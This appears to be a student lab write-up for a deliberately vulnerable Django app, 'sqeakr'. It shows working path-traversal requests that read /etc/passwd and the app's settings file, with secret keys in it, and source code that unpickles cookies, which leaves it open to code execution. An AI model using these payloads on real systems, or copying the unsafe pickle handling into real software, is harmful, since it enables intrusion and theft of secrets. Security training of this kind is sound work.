Skip to content

sqeakr

Summary

  1. get registration key from /home/student/sqeakr/sqeakr/settings.py file by using LFI (Local File Inclusion)/path traversal exploit.

  2. in /home/student/sqeakr/api/views/sqeakviews.py , draft cookie can exploit Python pickle vulnerability to get RCE

alt text

User-agent: *
Disallow: /api/login
Disallow: /api/register/
Disallow: /api/compose
Disallow: /api/draft
Disallow: /api/profile/update
Disallow: /api/profile/upload
Disallow: /api/profile/preview/*
Disallow: /api/profile/approve/*
Disallow: /api/profile/password
Disallow: /api/avatars/*
Allow: /api/sqeaks
Allow: /feed
# base64 encoded
../../../../.././etc/passwd
../../../../../../etc/passwd
../etc/passwd

GET /api/profile/preview/Li4vLi4vLi4vLi4vLi4vLi9ldGMvcGFzc3dk

# list folder content
GET /api/profile/avatars/....//sqeakr/ 

GET /api/profile/avatars/....//....//....//....//home/student/sqeakr/sqeakr/

../../../../.././home/student/sqeakr/sqeakr/settings.py

GET /api/profile/preview/Li4vLi4vLi4vLi4vLi4vLi9ob21lL3N0dWRlbnQvc3FlYWtyL3NxZWFrci9zZXR0aW5ncy5weQ==

alt text

alt text

alt text

alt text

alt text

"""
Django settings for sqeakr project.

Generated by 'django-admin startproject' using Django 2.2.12.

For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""

import os
import environ
env = environ.Env(
    # set casting, default value
    PICKLE_EXPECTED_LENGTH=(int, 100),
    DEBUG=(bool, False)
)
# reading .env file
environ.Env.read_env()

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'sz*h2fh58aa65t#efcs5rp6$wb&6!c_n@^(54$-c2yc@8isuzc'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env('DEBUG')

ALLOWED_HOSTS = ['*']


# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'main',
    'api',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'sqeakr.urls'

TEMPLATES = [
    {
        "BACKEND": "sqeakr.custom.Custom",
        "DIRS": [os.path.join(BASE_DIR, "templates")],
        "APP_DIRS": True,
    },
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, "templates")],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'sqeakr.wsgi.application'


# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME': env('DATABASE'),
        'USER': env('DB_USER'),
        'PASSWORD': env('POSTGRES_PASSWORD'),
        'HOST': env('DB_HOST'),
        'PORT': env('DB_PORT'),
    }
}


# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/

STATIC_URL = '/static/'
STATICFILES_DIRS = [
    os.path.join(BASE_DIR, 'static'),
]

MEDIA_URL='/avatars/'
MEDIA_ROOT=os.path.join(BASE_DIR, 'avatars')

# Avatar uploads - used in api/views/userviews.py
UPLOAD_DIR = '/tmp/'
AVATAR_DIR = os.getcwd() + '/avatars/'

# Registration Key
REGISTRATION_KEY = '58d9ec3c-8588-11ea-af48-acde48001122'
PICKLE_EXPECTED_LENGTH = int(env('PICKLE_EXPECTED_LENGTH'))
../home/student/sqeakr/api/admin.py
../home/student/sqeakr/api/tokens.py

/home/student/sqeakr/api/admin.py

from django.contrib import admin

# Register your models here.

/home/student/sqeakr/api/tokens.py

import pickle
import pickletools
import base64
import json
from uuid import UUID

from .models import UserProfile
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.core.exceptions import ObjectDoesNotExist

EXPECTED_LENGTH = getattr(settings, 'PICKLE_EXPECTED_LENGTH', 100)
class Tokens():

    allowedOps = [3, None, 0, 'auth', 1, 'userid', 2, 4, 62]
    expected_length = EXPECTED_LENGTH
    guest_uuid = '00000000-0000-4000-8000-000000000000'

    @staticmethod
    def create_token(userProfile):
        data = {'auth':1,'userid':str(userProfile.userid) }
        p = pickle.dumps(data)
        return base64.b64encode(p).decode('utf-8')

    @staticmethod
    def create_guest_token():
        data = {'auth':0,'userid':Tokens.guest_uuid}
        p = pickle.dumps(data)
        return base64.b64encode(p).decode('utf-8')

    @staticmethod
    def is_guest_token(token):
        if Tokens.is_safe(token):
            _data = pickle.loads(base64.b64decode(token))
            if _data['userid'] == Tokens.guest_uuid:
                return True

        return False

    @staticmethod
    def validate_token(token):
        if Tokens.is_safe(token):
            data = pickle.loads(base64.b64decode(token))
            if 'userid' in data.keys():
                _userid = data['userid']
                try: 
                    _profile = UserProfile.objects.get(userid=_userid)
                    return _profile
                except ObjectDoesNotExist:
                    return None
            else:
                return None
        else:
            # log it?
            return None

    @staticmethod
    def is_safe(token):
        try:
            for p in pickletools.genops(base64.b64decode(token)):
                if not any(p[1] == op for op in Tokens.allowedOps):
                    if not Tokens.validate_uuid4(p[1]):
                        return False

            if ((Tokens.expected_length - 5) <=len(token) <= (Tokens.expected_length + 5)):
                return True
            else:
                return False
        except:
            # bad padding
            return False

    @staticmethod
    def validate_uuid4(uuid_string):
        try:
            val = UUID(uuid_string, version=4)
        except ValueError:
            return False
        return val.hex == uuid_string.replace('-', '')

/home/student/sqeakr/api/urls.py

from django.urls import path, re_path

from api.views import userviews
from api.views import sqeakviews
from api.views import avatarviews

urlpatterns = [
    path('login', userviews.login, name='login'),
    path('sqeaks', sqeakviews.get_sqeaks, name='get_sqeaks'),
    path('compose', sqeakviews.compose, name='compose'),
    path('register/new', userviews.profile_new, name='profile_new'),
    path('draft', sqeakviews.draft, name='draft'),
    path('profile', userviews.profile, name='profile'),
    path('profile/update', userviews.update_user_profile, name='update_profile'),
    path('profile/upload', avatarviews.upload_avatar, name='upload_avatar'),
    path('profile/preview/<img>', avatarviews.preview_avatar, name='preview_avatar'),
    path('profile/approve/<img>', avatarviews.approve_avatar, name='approve_avatar'),
    path('profile/password', userviews.update_password, name='update_password'),
    path('profile/<username>', userviews.get_user_profile, name='profile'),
    path('sqeak/<int:sqeak_id>', sqeakviews.get_sqeak, name='get_sqeak'),
    path('sqeak/<int:sqeak_id>/like', sqeakviews.like_sqeak, name='like_sqeak'),
    re_path('avatars/(?P<username>[\S]+)', avatarviews.get_avatars_for_username, name='get_avatars'),
    path('<username>', sqeakviews.get_sqeaks_by_username, name='sqeaks'),
]

/home/student/sqeakr/api/views/sqeakviews.py

from django.shortcuts import render
from django.http import HttpResponse
from django.http import JsonResponse
from django.core import serializers
from django.contrib.auth.hashers import make_password
from django.core.exceptions import ObjectDoesNotExist
from django.views.decorators.csrf import csrf_exempt
from django.utils import timezone
from ..models import Sqeak, UserProfile, Like 
from ..constants import NOSQEAK, METHOD, MISSING_AUTH
from api.tokens import Tokens
import pickle
import base64
import json


def get_sqeaks(request):
    """
    Endpoint for retrieving all sqeaks. Supports pagination via 'page'
    and 'count' parameters.
    """
    all_sqeaks = Sqeak.objects.all().order_by('-created_date')

    page = 0
    per_page = 25
    try:
        page = int(request.GET.get('page','0'))
        per_page = int(request.GET.get('count','25'))
    except:
        pass

    if None == all_sqeaks:
        return JsonResponse(status=404, data={'status':'error','message':NOSQEAK})
    else:
        start = page * per_page
        end = start + per_page

        if len(all_sqeaks) > end :
            sqlist = all_sqeaks[start:end]
        else:
            sqlist = all_sqeaks[start:len(all_sqeaks)]

        _userid = get_userprofile_id(request=request)

        data = [sqeak.json() for sqeak in sqlist]
        data = process_likes(data=data, userid=_userid)

        return JsonResponse(data, safe=False)


def get_sqeak(request, sqeak_id):
    """
    Endpoint for getting a single sqeak based on id value.
    """
    if request.method == 'GET':
        # do stuff
        try:
            _userid = get_userprofile_id(request=request)
            sqeak = Sqeak.objects.get(pk=sqeak_id)
            data = sqeak.json()

            if None != _userid:
                for l in data['likes']:
                    if l['id'] == _userid:
                        data['is_liked'] = True

            return JsonResponse(data, safe=False)
        except ObjectDoesNotExist:
            return JsonResponse(status=404, data={'status':'error','message':NOSQEAK})
    else:
        return JsonResponse(status=405, data={'status':'error','message':METHOD})

def get_sqeaks_by_username(request, username):
    """
    Endpoint for retrieving all sqeaks for a given user. Supports
    pagination via 'page' and 'count' parameters.
    """
    if request.method == 'GET':
        # do stuff
        try:
            sqeaks = Sqeak.objects.filter(owner__username=username)
            sqeaks = sqeaks.order_by('-created_date')

            page = 0
            per_page = 25
            try:
                page = int(request.GET.get('page','0'))
                per_page = int(request.GET.get('count','25'))
            except:
                pass

            start = page * per_page
            end = start + per_page

            if len(sqeaks) > end :
                sqlist = sqeaks[start:end]
            else:
                sqlist = sqeaks[start:len(sqeaks)]

            data = [sqeak.json() for sqeak in sqlist]

            _userid = get_userprofile_id(request=request)
            data = process_likes(data=data, userid=_userid)

            return JsonResponse(data, safe=False)
        except ObjectDoesNotExist:
            return JsonResponse(status=404, data={'status':'error','message':NOSQEAK})
    else:
        return JsonResponse(status=405, data={'status':'error','message':METHOD})



@csrf_exempt
def compose(request):
    """
    Endpoint for creating a new sqeak.
    """
    if request.method == 'POST':
        if 'authtoken' in request.headers:
            _token = request.headers['authtoken']
            _profile = Tokens.validate_token(_token)
            # make sure we have a real user and not a guest
            if None != _profile:
                _txt = ''
                # get the necessary data
                if request.content_type == 'application/json':
                    data = json.loads(request.body.decode('utf-8'))
                    if 'sqeak' in data.keys():
                        _txt = data['sqeak'].strip()
                else:
                    _txt = request.POST.get('sqeak').strip()

                if '' != _txt:
                    if len(_txt) > 256:
                        _txt = _txt[0:256]

                    s = Sqeak(sqeak_text=_txt,owner=_profile,created_date=timezone.now())
                    s.save()
                    res = JsonResponse(status=201, data={'status':'ok','message':'Sqeak created'})
                    # delete the draft cookie if it exists
                    res.delete_cookie('draft')

                    return res

        return JsonResponse(status=401, data={'status':'error','message':MISSING_AUTH})
    else:
        return JsonResponse(status=405, data={'status':'error','message':METHOD})

@csrf_exempt
def draft(request):
    """
    Endpoint for saving a draft sqeak. Sqeak is saved as a cookie.
    """
    if 'authtoken' in request.headers:
        _token = request.headers['authtoken']
        _profile = Tokens.validate_token(_token)
        # make sure we have a real user and not a guest
        if None != _profile:
            if request.method == 'GET':
                # convert draft pickle and return back the contents
                _c = request.COOKIES.get('draft')
                if None == _c:
                    return JsonResponse({})
                try:
                    _txt = pickle.loads(base64.b64decode(_c))
                    return JsonResponse({'status':'ok','sqeak':_txt})
                except:
                    return JsonResponse({})
            elif request.method == 'POST':
                # create draft pickle and return it 
                _txt = ''
                # get the necessary data
                if request.content_type == 'application/json':
                    data = json.loads(request.body.decode('utf-8'))
                    if 'sqeak' in data.keys():
                        _txt = data['sqeak'].strip()
                    else:
                        _txt = request.POST.get('sqeak').strip()
                    if '' != _txt:
                        _p = pickle.dumps({'draft':_txt.strip()})
                        _c = base64.b64encode(_p).decode('utf-8')
                        _res = JsonResponse(status=201, data={'status':'ok','message':'Draft sqeak created'})
                        _res.set_cookie('draft', _c, httponly=True)
                    return _res 
                else:
                    return JsonResponse(status=405, data={'status':'error','message':METHOD})
            else:
                return JsonResponse(status=401, data={'status':'error','message':MISSING_AUTH})
    else:
        return JsonResponse(status=401, data={'status':'error','message':MISSING_AUTH})

@csrf_exempt
def like_sqeak(request, sqeak_id):
    """
    This function takes a sqeak_id and a userprofile_id. If a Like matching
    those values already exists, the active flag on it is flipped.
    If no matching Like is found, one is created and set as active.
    """
    if request.method == 'POST':
        # first, get the user
        if 'authtoken' in request.headers:
            _token = request.headers['authtoken']
            _profile = Tokens.validate_token(_token)
            # make sure we have a real user and not a guest
            if None != _profile:
               # if we have a valid user token, get the sqeak
                try:
                    sqeak = Sqeak.objects.get(pk=sqeak_id)
                    if None != sqeak:
                        # see if we have a like
                        try:
                            like = Like.objects.get(owner__id=_profile.id, sqeak__id=sqeak.id)
                            # if we do, togle active it
                            active = not like.active 
                            like.active = active
                            like.save()
                            message = 'Sqeak liked'
                            if active == False:
                                message = 'Sqeak unliked'
                            return JsonResponse(status=200, data={'status':'ok','message':message})
                        except ObjectDoesNotExist:
                            # if we don't have a Like, make one
                            like = Like()
                            like.owner = _profile
                            like.sqeak = sqeak
                            like.active = True
                            like.save()      
                            return JsonResponse(status=200, data={'status':'ok','message':'Sqeak liked'})
                    else:
                        return JsonResponse(status=404, data={'status':'error','message':NOSQEAK})
                except ObjectDoesNotExist:
                    return JsonResponse(status=404, data={'status':'error','message':NOSQEAK})

        return JsonResponse(status=401, data={'status':'error','message':MISSING_AUTH})
    else:
        return JsonResponse(status=405, data={'status':'error','message':METHOD})


def get_userprofile_id(request):
    """
    This function takes a request, checks it for an auth token,
    and returns the userProfile associated with the token (if any).
    """
    if 'authtoken' in request.headers:
        _token = request.headers['authtoken']
        _profile = Tokens.validate_token(_token)

        if None != _profile:
            return _profile.id

    return None

def process_likes(data, userid):
    """
    Given an array of json data (data), loop through it and mark 
    sqeaks as liked based on the provided userid
    """
    if None != userid:
        for d in data:
            for l in d['likes']:
                if l['id'] == userid:
                    d['is_liked'] = True

    return data